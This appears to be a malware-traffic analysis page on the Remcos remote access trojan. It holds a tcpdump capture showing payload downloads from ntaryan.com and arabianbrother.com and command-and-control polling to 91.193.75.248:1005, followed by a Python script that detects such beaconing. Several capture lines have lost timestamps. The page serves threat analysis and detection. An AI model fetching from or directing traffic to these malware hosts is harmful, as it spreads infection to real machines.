Attachment: a (383 KB), added February 10, 2020 12:36 am by admin
Remcos is a RAT (remote access trojan), which means attackers use it to perform actions on infected machines remotely. The malware is very actively maintained, with updates released almost every month.
Type: Trojan
Origin: ex-USSR territory
First seen: 1 June, 2016
Last seen: 9 February, 2020
2020-02-08 21:12:20.981585 IP 192.168.86.25.56271 > 46.4.22.188.80: Flags [P.], seq 2260857165:2260857557, ack 24046668, win 16425, length 392: HTTP: GET /a/a.exe HTTP/1.1
GET /a/a.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ntaryan.com
Connection: Keep-Alive
2020-02-08 21:12:21.096476 IP 46.4.22.188.80 > 192.168.86.25.56271: Flags [P.], seq 1:1370, ack 392, win 123, length 1369: HTTP: HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 1147
Date: Sun, 09 Feb 2020 02:13:09 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Location: https://ntaryan.com/a/a.exe
Connection: Keep-Alive
301 Moved Permanently
The document has been permanently moved. Proudly powered by LiteSpeed Web Server
Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.
2020-02-08 21:12:29.915772 IP 192.168.86.25.56272 > 198.96.95.42.80: Flags [P.], seq 980367087:980367245, ack 2427136781, win 16425, length 158: HTTP: GET /a/a.bin HTTP/1.1
GET /a/a.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: arabianbrother.com
Cache-Control: no-cache
2020-02-08 21:12:29.973133 IP 198.96.95.42.80 > 192.168.86.25.56272: Flags [P.], seq 1:232, ack 158, win 237, length 231: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/octet-stream
Last-Modified: Sat, 08 Feb 2020 09:06:17 GMT
Accept-Ranges: bytes
Content-Length: 127040
Date: Sun, 09 Feb 2020 02:13:18 GMT
Server: LiteSpeed
2020-02-08 21:12:30.160111 IP 198.96.95.42.80 > 192.168.86.25.56272: Flags [P.], seq 103892:105352, ack 158, win 237, length 1460: HTTP
2020-02-08 21:12:30.161350 IP 198.96.95.42.80 > 192.168.86.25.56272: Flags [P.], seq 127252:127272, ack 158, win 237, length 20: HTTP
2020-02-08 21:12:33.822577 IP 192.168.86.25.56273 > 198.96.95.42.80: Flags [P.], seq 3026874668:3026874826, ack 2251535379, win 16425, length 158: HTTP: GET /a/a.bin HTTP/1.1
GET /a/a.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: arabianbrother.com
Cache-Control: no-cache
2020-02-08 21:13:15.419664 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 209:235, ack 2299, win 65, length 26
2020-02-08 21:13:15.420766 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2299:2492, ack 235, win 16554, length 193
[timestamp lost in extraction] IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 235:261, ack 2492, win 64, length 26
2020-02-08 21:13:20.429820 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2492:2686, ack 261, win 16548, length 194
[timestamp lost in extraction] IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 261:287, ack 2686, win 63, length 26
2020-02-08 21:13:25.445454 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2686:2880, ack 287, win 16541, length 194
[timestamp lost in extraction] IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 287:313, ack 2880, win 63, length 26
2020-02-08 21:13:30.461804 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2880:3074, ack 313, win 16535, length 194
2020-02-08 21:13:30.980975 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 287:313, ack 2880, win 63, length 26
2020-02-08 21:13:31.167560 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2880:3074, ack 313, win 16535, length 194
2020-02-08 21:13:35.474537 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 313:339, ack 3074, win 62, length 26
2020-02-08 21:13:35.475164 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 3074:3268, ack 339, win 16528, length 194
[timestamp lost in extraction] IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 339:365, ack 3268, win 61, length 26
2020-02-08 21:13:40.549500 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 3268:3462, ack 365, win 16522, length 194
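As an added example (not from the original post), a small Python script that parses tcpdump summary lines like those above and flags the periodic, fixed-size pushes on port 1005 that give away the command-and-control polling in this capture. The sample lines are constructed to mirror the capture; timestamps the page lost are filled with made-up values.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# One tcpdump summary line: timestamp, "IP src.sport > dst.dport:", ..., "length N".
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): .*\blength (?P<len>\d+)"
)

def parse_summary_lines(lines):
    """Parse summary lines; payload dumps and damaged lines that do not match are skipped."""
    out = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            out.append((ts, m["src"], int(m["sport"]), m["dst"], int(m["dport"]), int(m["len"])))
    return out

def find_beacons(lines, min_pkts=4, max_jitter=0.5):
    """Flag flows whose pushes arrive at a near-constant interval with one fixed payload length."""
    flows = defaultdict(list)
    for ts, src, sport, dst, dport, length in parse_summary_lines(lines):
        flows[(src, sport, dst, dport)].append((ts, length))
    hits = {}
    for key, pkts in flows.items():
        if len(pkts) < min_pkts:
            continue  # too few packets to call the flow periodic
        pkts.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(pkts, pkts[1:])]
        period = statistics.median(gaps)
        sizes = {length for _, length in pkts}
        if max(abs(g - period) for g in gaps) <= max_jitter and len(sizes) == 1:
            hits[key] = {"period_s": round(period, 1), "length": sizes.pop(), "count": len(pkts)}
    return hits

# Constructed sample modelled on the capture above: one HTTP request, one
# payload-dump line (skipped by the parser), and five 26-byte pushes from remote port 1005.
SAMPLE = """\
2020-02-08 21:12:29.915772 IP 192.168.86.25.56272 > 198.96.95.42.80: Flags [P.], seq 1:159, ack 1, win 16425, length 158: HTTP: GET /a/a.bin HTTP/1.1
E..B1K@.s...[.K...V.....>(=...EMP..A........]....0........n....#3.
2020-02-08 21:13:15.419664 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 209:235, ack 2299, win 65, length 26
2020-02-08 21:13:20.425101 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 235:261, ack 2492, win 64, length 26
2020-02-08 21:13:25.440912 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 261:287, ack 2686, win 63, length 26
2020-02-08 21:13:30.457230 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 287:313, ack 2880, win 63, length 26
2020-02-08 21:13:35.474537 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 313:339, ack 3074, win 62, length 26
""".splitlines()
```

Running find_beacons over the sample reports the 91.193.75.248:1005 flow with a 5.0 s period and a constant 26-byte length, while the single HTTP request is ignored.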